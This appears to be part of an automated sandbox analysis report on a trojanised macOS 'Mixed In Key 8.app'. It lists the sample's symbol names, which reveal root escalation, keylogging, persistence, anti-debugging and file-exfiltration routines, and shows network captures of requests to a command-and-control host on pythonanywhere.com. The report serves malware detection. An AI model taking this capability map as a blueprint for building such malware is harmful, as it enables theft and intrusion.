                                                                                                    datasize248
                                                                                                    NameValue
                                                                                                    dataoff87160
                                                                                                    datasize8
                                                                                                    Internal Symbols
                                                                                                    _EI_INSTSGN
                                                                                                    _EI_INSTSGN_C
                                                                                                    _EI_RESCUE
                                                                                                    _EI_SELFNAMES
                                                                                                    _EI_SELFNAMES_C
                                                                                                    _EI_UNWANTED
                                                                                                    _EI_UNWANTED_C
                                                                                                    __check_if_targeted
                                                                                                    __construct_plist_path
                                                                                                    __dispatch
                                                                                                    __ei_init_crc32_tab
                                                                                                    __ei_rootgainer_elevate
                                                                                                    __generate_xkey
                                                                                                    __get_host_identifier
                                                                                                    __get_process_list
                                                                                                    __home_stub
                                                                                                    __is_target
                                                                                                    __make_temp_name
                                                                                                    __mh_execute_header
                                                                                                    __pack_trailer
                                                                                                    __react_exec
                                                                                                    __react_host
                                                                                                    __react_keys
                                                                                                    __react_ping
                                                                                                    __react_save
                                                                                                    __react_scmd
                                                                                                    __react_start
                                                                                                    __rotate
                                                                                                    __tp_decrypt
                                                                                                    __tp_encrypt
                                                                                                    __unpack_trailer
                                                                                                    _acquire_root
                                                                                                    _append_ei
                                                                                                    _bbbb
                                                                                                    _build_plist
                                                                                                    _carve_target
                                                                                                    _check_file_exists
                                                                                                    _check_if_running
                                                                                                    _check_key
                                                                                                    _check_modification
                                                                                                    _cnt_askroot
                                                                                                    _cnt_failed_asks
                                                                                                    _create_rescue_executable
                                                                                                    _ei_carver_main
                                                                                                    _ei_forensic_sendfile
                                                                                                    _ei_forensic_thread
                                                                                                    _ei_get_host_info
                                                                                                    _ei_get_macaddr
                                                                                                    _ei_loader_main
                                                                                                    _ei_loader_thread
                                                                                                    _ei_pers_thread
                                                                                                    _ei_persistence_main
                                                                                                    _ei_read_spot
                                                                                                    _ei_rootgainer_main
                                                                                                    _ei_run_file
                                                                                                    _ei_run_memory_hrd
                                                                                                    _ei_run_thread
                                                                                                    _ei_save_spot
                                                                                                    _ei_selfretain_main
                                                                                                    _ei_str
                                                                                                    _ei_str_encode
                                                                                                    _ei_timer_check
                                                                                                    _ei_timer_create
                                                                                                    _ei_timer_start
                                                                                                    _ei_timer_stop
                                                                                                    _ei_tpyrc_checksum
                                                                                                    _eib_decode
                                                                                                    _eib_encode
                                                                                                    _eib_pack_c
                                                                                                    _eib_secure_decode
                                                                                                    _eib_secure_encode
                                                                                                    _eib_string_fa
                                                                                                    _eib_string_key
                                                                                                    _eib_unpack_i
                                                                                                    _eic_save_message
                                                                                                    _eic_signature
                                                                                                    _eicc_deserialize_request
                                                                                                    _eicc_make_request
                                                                                                    _eicc_serialize_request
                                                                                                    _eicmn_communicate
                                                                                                    _eicmn_launch_helper
                                                                                                    _eicmn_show_alert
                                                                                                    _eiht_append_command
                                                                                                    _eiht_check_command
                                                                                                    _eiht_drop_ccache
                                                                                                    _eiht_get_update
                                                                                                    _eilf_rglk_watch_routine
                                                                                                    _eip_decrypt
                                                                                                    _eip_encrypt
                                                                                                    _eip_key
                                                                                                    _eip_seeds
                                                                                                    _extended_check_modification
                                                                                                    _extract_ei
                                                                                                    _get_mediator
                                                                                                    _get_targets
                                                                                                    _http_request
                                                                                                    _http_request_f
                                                                                                    _install_daemon
                                                                                                    _is_carved
                                                                                                    _is_debugging
                                                                                                    _is_executable
                                                                                                    _is_file_target
                                                                                                    _is_lfsc_target
                                                                                                    _is_virtual_mchn
                                                                                                    _kconvert
                                                                                                    _kill_unwanted
                                                                                                    _lfsc_dirlist
                                                                                                    _lfsc_get_contents
                                                                                                    _lfsc_match
                                                                                                    _lfsc_pack_binary
                                                                                                    _lfsc_parse_template
                                                                                                    _lfsc_unpack_binary
                                                                                                    _main
                                                                                                    _mediated
                                                                                                    _persist_executable
                                                                                                    _persist_executable_frombundle
                                                                                                    _prevent_trace
                                                                                                    _priv_rescue_data
                                                                                                    _priv_rescue_data_s
                                                                                                    _process_event
                                                                                                    _random_key
                                                                                                    _release_events
                                                                                                    _resque_myself
                                                                                                    _run_as_admin
                                                                                                    _run_as_admin_async
                                                                                                    _run_daemon
                                                                                                    _run_daemon_u
                                                                                                    _run_regular
                                                                                                    _run_regular_async
                                                                                                    _run_target
                                                                                                    _s_append_or_not
                                                                                                    _s_carve_or_not
                                                                                                    _s_get_spot
                                                                                                    _s_is_high_time
                                                                                                    _s_random_action
                                                                                                    _s_save_spot
                                                                                                    _set_important_files
                                                                                                    _set_resque_data
                                                                                                    _sleepy
                                                                                                    _syncsem
                                                                                                    _th_cmd_async
                                                                                                    _tpcrypt
                                                                                                    _tpdcrypt
                                                                                                    _uncarve_target
                                                                                                    _urlsafe
                                                                                                    _user_info
                                                                                                    External symbols
                                                                                                    _AuthorizationCopyRights
                                                                                                    _AuthorizationCreate
                                                                                                    _CFBundleCreate
                                                                                                    _CFBundleGetFunctionPointerForName
                                                                                                    _CFMachPortCreateRunLoopSource
                                                                                                    _CFRelease
                                                                                                    _CFRunLoopAddSource
                                                                                                    _CFRunLoopGetCurrent
                                                                                                    _CFRunLoopRun
                                                                                                    _CFURLCreateFromFileSystemRepresentation
                                                                                                    _CGEventGetIntegerValueField
                                                                                                    _CGEventTapCreate
                                                                                                    _CGEventTapEnable
                                                                                                    _NSAddressOfSymbol
                                                                                                    _NSCreateObjectFileImageFromMemory
                                                                                                    _NSDestroyObjectFileImage
                                                                                                    _NSLinkModule
                                                                                                    _NSLookupSymbolInModule
                                                                                                    _NSUnLinkModule
                                                                                                    _NXFindBestFatArch
                                                                                                    _NXGetLocalArchInfo
                                                                                                    ___assert_rtn
                                                                                                    ___error
                                                                                                    ___memcpy_chk
                                                                                                    ___memset_chk
                                                                                                    ___sprintf_chk
                                                                                                    ___stack_chk_fail
                                                                                                    _calloc
                                                                                                    _chmod
                                                                                                    _close
                                                                                                    _closedir
                                                                                                    _connect
                                                                                                    _execl
                                                                                                    _execv
                                                                                                    _exit
                                                                                                    _fclose
                                                                                                    _fopen
                                                                                                    _fork
                                                                                                    _fread
                                                                                                    _free
                                                                                                    _fseek
                                                                                                    _ftell
                                                                                                    _ftrylockfile
                                                                                                    _funlockfile
                                                                                                    _fwrite
                                                                                                    _getenv
                                                                                                    _geteuid
                                                                                                    _gethostbyname
                                                                                                    _gethostname
                                                                                                    _getlogin
                                                                                                    _getpagesize
                                                                                                    _getpid
                                                                                                    _if_nametoindex
                                                                                                    _kevent
                                                                                                    _kill
                                                                                                    _kqueue
                                                                                                    _malloc
                                                                                                    _memcpy
                                                                                                    _memset
                                                                                                    _mkdir
                                                                                                    _nl_langinfo
                                                                                                    _open
                                                                                                    _opendir$INODE64
                                                                                                    _popen
                                                                                                    _printf
                                                                                                    _pthread_create
                                                                                                    _ptrace
                                                                                                    _random
                                                                                                    _read
                                                                                                    _readdir$INODE64
                                                                                                    _realloc
                                                                                                    _rename
                                                                                                    _sleep
                                                                                                    _socket
                                                                                                    _srandom
                                                                                                    _stat$INODE64
                                                                                                    _strcasestr
                                                                                                    _strcmp
                                                                                                    _strerror
                                                                                                    _strlen
                                                                                                    _strrchr
                                                                                                    _strstr
                                                                                                    _sysctl
                                                                                                    _system
                                                                                                    _time
                                                                                                    _uname
                                                                                                    _unlink
                                                                                                    _vm_allocate
                                                                                                    _vm_deallocate
                                                                                                    _write
                                                                                                    Extracted File
                                                                                                    File path:Mixed In Key 8.app/Contents/_CodeSignature/CodeResources
                                                                                                    File size:53912
                                                                                                    File type:XML document text
                                                                                                    Extracted File
                                                                                                    File path:Mixed In Key 8.app/Contents/Info.plist
                                                                                                    File size:3293
                                                                                                    File type:XML document text

                                                                                                    Network Behavior

                                                                                                    Network Port Distribution

                                                                                                    TCP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Jul 1, 2020 14:18:46.317640066 MESZ4916480192.168.0.5172.247.178.67
                                                                                                    Jul 1, 2020 14:18:46.317730904 MESZ4916580192.168.0.5172.247.179.32
                                                                                                    Jul 1, 2020 14:18:46.325463057 MESZ804916472.247.178.67192.168.0.51
                                                                                                    Jul 1, 2020 14:18:46.326565027 MESZ4916480192.168.0.5172.247.178.67
                                                                                                    Jul 1, 2020 14:18:46.326716900 MESZ804916572.247.179.32192.168.0.51
                                                                                                    Jul 1, 2020 14:18:46.328079939 MESZ4916580192.168.0.5172.247.179.32
                                                                                                    Jul 1, 2020 14:18:47.377321959 MESZ4916880192.168.0.5172.247.179.32
                                                                                                    Jul 1, 2020 14:18:47.378035069 MESZ4917980192.168.0.5172.247.179.32
                                                                                                    Jul 1, 2020 14:18:47.385474920 MESZ804916872.247.179.32192.168.0.51
                                                                                                    Jul 1, 2020 14:18:47.385732889 MESZ4916880192.168.0.5172.247.179.32
                                                                                                    Jul 1, 2020 14:18:47.386153936 MESZ804917972.247.179.32192.168.0.51
                                                                                                    Jul 1, 2020 14:18:47.386343002 MESZ4917980192.168.0.5172.247.179.32
                                                                                                    Jul 1, 2020 14:18:52.441761017 MESZ49186443192.168.0.5123.210.249.175
                                                                                                    Jul 1, 2020 14:18:52.442210913 MESZ49185443192.168.0.5123.210.249.175
                                                                                                    Jul 1, 2020 14:18:52.443397999 MESZ49186443192.168.0.5123.210.249.175
                                                                                                    Jul 1, 2020 14:18:52.443413973 MESZ49185443192.168.0.5123.210.249.175
                                                                                                    Jul 1, 2020 14:18:52.449728012 MESZ4434918623.210.249.175192.168.0.51
                                                                                                    Jul 1, 2020 14:18:52.449731112 MESZ4434918623.210.249.175192.168.0.51
                                                                                                    Jul 1, 2020 14:18:52.450742006 MESZ4434918523.210.249.175192.168.0.51
                                                                                                    Jul 1, 2020 14:18:52.450762033 MESZ4434918523.210.249.175192.168.0.51
                                                                                                    Jul 1, 2020 14:18:52.451019049 MESZ4434918623.210.249.175192.168.0.51
                                                                                                    Jul 1, 2020 14:18:52.451114893 MESZ49186443192.168.0.5123.210.249.175
                                                                                                    Jul 1, 2020 14:18:52.451129913 MESZ49186443192.168.0.5123.210.249.175
                                                                                                    Jul 1, 2020 14:18:52.451178074 MESZ4434918523.210.249.175192.168.0.51
                                                                                                    Jul 1, 2020 14:18:52.451551914 MESZ49185443192.168.0.5123.210.249.175
                                                                                                    Jul 1, 2020 14:18:52.451561928 MESZ49185443192.168.0.5123.210.249.175
                                                                                                    Jul 1, 2020 14:18:52.451566935 MESZ49186443192.168.0.5123.210.249.175
                                                                                                    Jul 1, 2020 14:18:52.451572895 MESZ49185443192.168.0.5123.210.249.175
                                                                                                    Jul 1, 2020 14:18:58.159250021 MESZ4923380192.168.0.51104.103.72.192
                                                                                                    Jul 1, 2020 14:18:58.171356916 MESZ8049233104.103.72.192192.168.0.51
                                                                                                    Jul 1, 2020 14:18:58.172734022 MESZ4923380192.168.0.51104.103.72.192
                                                                                                    Jul 1, 2020 14:19:35.238648891 MESZ4928780192.168.0.5135.173.69.207
                                                                                                    Jul 1, 2020 14:19:35.327526093 MESZ804928735.173.69.207192.168.0.51
                                                                                                    Jul 1, 2020 14:19:35.328933001 MESZ4928780192.168.0.5135.173.69.207
                                                                                                    Jul 1, 2020 14:19:35.329018116 MESZ4928780192.168.0.5135.173.69.207
                                                                                                    Jul 1, 2020 14:19:35.417500019 MESZ804928735.173.69.207192.168.0.51
                                                                                                    Jul 1, 2020 14:19:35.417798996 MESZ804928735.173.69.207192.168.0.51
                                                                                                    Jul 1, 2020 14:19:35.417814016 MESZ804928735.173.69.207192.168.0.51
                                                                                                    Jul 1, 2020 14:19:35.417831898 MESZ804928735.173.69.207192.168.0.51
                                                                                                    Jul 1, 2020 14:19:35.418085098 MESZ4928780192.168.0.5135.173.69.207
                                                                                                    Jul 1, 2020 14:19:35.418112993 MESZ4928780192.168.0.5135.173.69.207
                                                                                                    Jul 1, 2020 14:19:35.418150902 MESZ4928780192.168.0.5135.173.69.207
                                                                                                    Jul 1, 2020 14:19:35.506812096 MESZ804928735.173.69.207192.168.0.51
                                                                                                    Jul 1, 2020 14:19:35.686880112 MESZ4928880192.168.0.5135.173.69.207
                                                                                                    Jul 1, 2020 14:19:35.775660992 MESZ804928835.173.69.207192.168.0.51
                                                                                                    Jul 1, 2020 14:19:35.775897026 MESZ4928880192.168.0.5135.173.69.207
                                                                                                    Jul 1, 2020 14:19:35.775916100 MESZ4928880192.168.0.5135.173.69.207
                                                                                                    Jul 1, 2020 14:19:35.864758968 MESZ804928835.173.69.207192.168.0.51
                                                                                                    Jul 1, 2020 14:19:35.864979982 MESZ804928835.173.69.207192.168.0.51
                                                                                                    Jul 1, 2020 14:19:35.864993095 MESZ804928835.173.69.207192.168.0.51
                                                                                                    Jul 1, 2020 14:19:35.865006924 MESZ804928835.173.69.207192.168.0.51
                                                                                                    Jul 1, 2020 14:19:35.865336895 MESZ4928880192.168.0.5135.173.69.207
                                                                                                    Jul 1, 2020 14:19:35.865356922 MESZ4928880192.168.0.5135.173.69.207
                                                                                                    Jul 1, 2020 14:19:35.914527893 MESZ4928880192.168.0.5135.173.69.207
                                                                                                    Jul 1, 2020 14:19:36.003386974 MESZ804928835.173.69.207192.168.0.51
                                                                                                    Jul 1, 2020 14:19:37.582461119 MESZ4928980192.168.0.5135.173.69.207
                                                                                                    Jul 1, 2020 14:19:37.673336983 MESZ804928935.173.69.207192.168.0.51
                                                                                                    Jul 1, 2020 14:19:37.673609018 MESZ4928980192.168.0.5135.173.69.207
                                                                                                    Jul 1, 2020 14:19:37.673650026 MESZ4928980192.168.0.5135.173.69.207
                                                                                                    Jul 1, 2020 14:19:37.764200926 MESZ804928935.173.69.207192.168.0.51
                                                                                                    Jul 1, 2020 14:19:37.764440060 MESZ804928935.173.69.207192.168.0.51
                                                                                                    Jul 1, 2020 14:19:37.764457941 MESZ804928935.173.69.207192.168.0.51
                                                                                                    Jul 1, 2020 14:19:37.764476061 MESZ804928935.173.69.207192.168.0.51
                                                                                                    Jul 1, 2020 14:19:37.764780998 MESZ4928980192.168.0.5135.173.69.207
                                                                                                    Jul 1, 2020 14:19:37.764822006 MESZ4928980192.168.0.5135.173.69.207
                                                                                                    Jul 1, 2020 14:19:37.764867067 MESZ4928980192.168.0.5135.173.69.207
                                                                                                    Jul 1, 2020 14:19:37.855570078 MESZ804928935.173.69.207192.168.0.51
                                                                                                    Jul 1, 2020 14:19:38.142378092 MESZ4929080192.168.0.5135.173.69.207
                                                                                                    Jul 1, 2020 14:19:38.231988907 MESZ804929035.173.69.207192.168.0.51
                                                                                                    Jul 1, 2020 14:19:38.233449936 MESZ4929080192.168.0.5135.173.69.207
                                                                                                    Jul 1, 2020 14:19:38.233485937 MESZ4929080192.168.0.5135.173.69.207
                                                                                                    Jul 1, 2020 14:19:38.322833061 MESZ804929035.173.69.207192.168.0.51
                                                                                                    Jul 1, 2020 14:19:38.322874069 MESZ804929035.173.69.207192.168.0.51
                                                                                                    Jul 1, 2020 14:19:38.322968006 MESZ804929035.173.69.207192.168.0.51
                                                                                                    Jul 1, 2020 14:19:38.322988033 MESZ804929035.173.69.207192.168.0.51
                                                                                                    Jul 1, 2020 14:19:38.323231936 MESZ4929080192.168.0.5135.173.69.207
                                                                                                    Jul 1, 2020 14:19:38.323263884 MESZ4929080192.168.0.5135.173.69.207
                                                                                                    Jul 1, 2020 14:19:38.422518015 MESZ4929080192.168.0.5135.173.69.207
                                                                                                    Jul 1, 2020 14:19:38.512141943 MESZ804929035.173.69.207192.168.0.51

                                                                                                    UDP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Jul 1, 2020 14:19:03.285726070 MESZ5350553192.168.0.518.8.8.8
                                                                                                    Jul 1, 2020 14:19:03.302349091 MESZ53535058.8.8.8192.168.0.51
                                                                                                    Jul 1, 2020 14:19:03.502123117 MESZ5152153192.168.0.518.8.8.8
                                                                                                    Jul 1, 2020 14:19:03.527648926 MESZ53515218.8.8.8192.168.0.51
                                                                                                    Jul 1, 2020 14:19:04.143076897 MESZ5457653192.168.0.518.8.8.8
                                                                                                    Jul 1, 2020 14:19:04.168859959 MESZ53545768.8.8.8192.168.0.51
                                                                                                    Jul 1, 2020 14:19:16.091272116 MESZ5453753192.168.0.518.8.8.8
                                                                                                    Jul 1, 2020 14:19:16.091778040 MESZ6041653192.168.0.518.8.8.8
                                                                                                    Jul 1, 2020 14:19:16.107928038 MESZ53604168.8.8.8192.168.0.51
                                                                                                    Jul 1, 2020 14:19:16.116513014 MESZ53545378.8.8.8192.168.0.51
                                                                                                    Jul 1, 2020 14:19:16.287925005 MESZ5849953192.168.0.518.8.8.8
                                                                                                    Jul 1, 2020 14:19:16.312113047 MESZ53584998.8.8.8192.168.0.51
                                                                                                    Jul 1, 2020 14:19:32.526120901 MESZ4923853192.168.0.518.8.8.8
                                                                                                    Jul 1, 2020 14:19:32.541798115 MESZ53492388.8.8.8192.168.0.51
                                                                                                    Jul 1, 2020 14:19:35.191009045 MESZ6405153192.168.0.518.8.8.8
                                                                                                    Jul 1, 2020 14:19:35.237027884 MESZ53640518.8.8.8192.168.0.51
                                                                                                    Jul 1, 2020 14:19:35.418962002 MESZ5941553192.168.0.518.8.8.8
                                                                                                    Jul 1, 2020 14:19:35.434720039 MESZ53594158.8.8.8192.168.0.51

                                                                                                    DNS Queries

                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                    Jul 1, 2020 14:19:35.191009045 MESZ192.168.0.518.8.8.80x6cdStandard query (0)andrewka6.pythonanywhere.comA (IP address)IN (0x0001)
                                                                                                    Jul 1, 2020 14:19:35.418962002 MESZ192.168.0.518.8.8.80x7f3Standard query (0)256256

                                                                                                    DNS Answers

                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                    Jul 1, 2020 14:19:35.237027884 MESZ8.8.8.8192.168.0.510x6cdNo error (0)andrewka6.pythonanywhere.com35.173.69.207A (IP address)IN (0x0001)

                                                                                                    HTTP Request Dependency Graph

                                                                                                    • andrewka6.pythonanywhere.com

                                                                                                    HTTP Packets

                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                    0192.168.0.514928735.173.69.20780
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Jul 1, 2020 14:19:35.329018116 MESZ106OUTGET /ret.txt HTTP/1.0
                                                                                                    Host: andrewka6.pythonanywhere.com
                                                                                                    Jul 1, 2020 14:19:35.417798996 MESZ107INHTTP/1.1 404 Not Found
                                                                                                    Date: Wed, 01 Jul 2020 12:19:35 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 2921
                                                                                                    Connection: close
                                                                                                    ETag: "5ece92c1-b69"
                                                                                                    Server: PythonAnywhere
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3a 20 50 79 74 68 6f 6e 41 6e 79 77 68 65 72 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 35 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 72 65 62 75 63 68 65 74 20 4d 53 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 66 6f 72 2d 73 69 74 65 2d 6f 77 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 70 79 74 68 6f 6e 61 6e 79 77 68 65 72 65 2d 65 72 72 6f 72 2d 69 6d 61 67 65 73 2f 6c 6f 67 6f 2d 32 33 34 78 33 35 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 43 6f 6d 69 6e 67 20 53 6f 6f 6e 21 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 54 68 69 73 20 69 73 20 67 6f 69 6e 67 20 74 6f 20 62 65 20 61 6e 6f 74 68 65 72 20 67 72 65 61 74 20 77 65 62 73 69 74 65 20 68 6f 73 74 65 64 20 62 79 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 79 74 68 6f 6e 61 6e 79 77 68 65 72 65 2e 63 6f 6d 2f 22 3e 50 79 74 68 6f 6e 41 6e 79 77 68 65 72 65 3c 2f 61 3e 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 50 79 74 68 6f 6e 41 6e 79 77 68 65 72 65 20 6c 65 74 73 20 79 6f 75 20 68 6f 73 74 2c 20 72 75 6e 2c 20 61 6e 64 20 63 6f 64 65 20 50 79 74 68 6f 6e 20 69 6e 20 74 68 65 20 63 6c 6f 75 64 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 4f 75 72 20 66 72 65 65 20 70 6c 61 6e 20 67 69 76 65 73 20 79 6f 75 20 61 63 63 65 73 73 20 74 6f 20 6d 61 63 68 69 6e 65 73 20 77 69 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 76 65 72 79 74 68 69 6e 67 20 61 6c 72 65 61 64 79 20 73 65 74 20 75 70 20 66 6f 72 20 79 6f 75 2e 20 59 6f 75 20 63 61 6e 20 64 65 76 65 6c 6f 70 20 61 6e 64 20 68 6f 73
                                                                                                    Data Ascii: <html> <head> <title>Coming Soon: PythonAnywhere</title> <style> body { font-family: Helvetica, Arial, sans-serif; width: 500px; margin-left: auto; margin-right: auto; margin-top: 20px; } h1 { font-family: Trebuchet MS, Helvetica, Arial, sans-serif; } .for-site-owner { font-size: smaller; margin-top: 30px; color: gray; } </style> </head> <body> <img src="https://s3.amazonaws.com/pythonanywhere-error-images/logo-234x35.png" /> <div class="main"> <h1>Coming Soon!</h1> <p> This is going to be another great website hosted by <a href="https://www.pythonanywhere.com/">PythonAnywhere</a>. </p> <p> PythonAnywhere lets you host, run, and code Python in the cloud. Our free plan gives you access to machines with everything already set up for you. You can develop and hos
                                                                                                    Jul 1, 2020 14:19:35.417814016 MESZ108INData Raw: 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 6f 72 20 61 6e 79 20 6f 74 68 65 72 20 63 6f 64 65 20 64 69 72 65 63 74 6c 79 20 66 72 6f 6d 20 79 6f 75 72 20 62 72 6f 77 73 65 72 0a 20 20 20 20 20 20
                                                                                                    Data Ascii: t your website or any other code directly from your browser without having to install software or manage your own server. </p> <p> Need more power? Upgraded plans start a
                                                                                                    Jul 1, 2020 14:19:35.417831898 MESZ109INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 49 66 20 79 6f 75 27 72 65 20 68 61 76 69 6e 67 20 70 72 6f 62 6c 65 6d 73 20 67 65 74 74 69 6e 67 20 69 74 20 61 6c 6c 20 77 6f 72 6b 69 6e 67 2c 20 64 72 6f 70 20 75 73 20 61 20 6c 69 6e 65 20 61 74 0a
                                                                                                    Data Ascii: If you're having problems getting it all working, drop us a line at support@pythonanywhere.com, or in <a href="https://www.pythonanywhere.com/forums/">the forums</a>, or using the "


                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                    1192.168.0.514928835.173.69.20780
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Jul 1, 2020 14:19:35.775916100 MESZ110OUTGET /ret.txt HTTP/1.0
                                                                                                    Host: andrewka6.pythonanywhere.com
                                                                                                    Jul 1, 2020 14:19:35.864979982 MESZ111INHTTP/1.1 404 Not Found
                                                                                                    Date: Wed, 01 Jul 2020 12:19:35 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 2921
                                                                                                    Connection: close
                                                                                                    ETag: "5ece92c1-b69"
                                                                                                    Server: PythonAnywhere
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3a 20 50 79 74 68 6f 6e 41 6e 79 77 68 65 72 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 35 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 72 65 62 75 63 68 65 74 20 4d 53 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 66 6f 72 2d 73 69 74 65 2d 6f 77 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 70 79 74 68 6f 6e 61 6e 79 77 68 65 72 65 2d 65 72 72 6f 72 2d 69 6d 61 67 65 73 2f 6c 6f 67 6f 2d 32 33 34 78 33 35 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 43 6f 6d 69 6e 67 20 53 6f 6f 6e 21 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 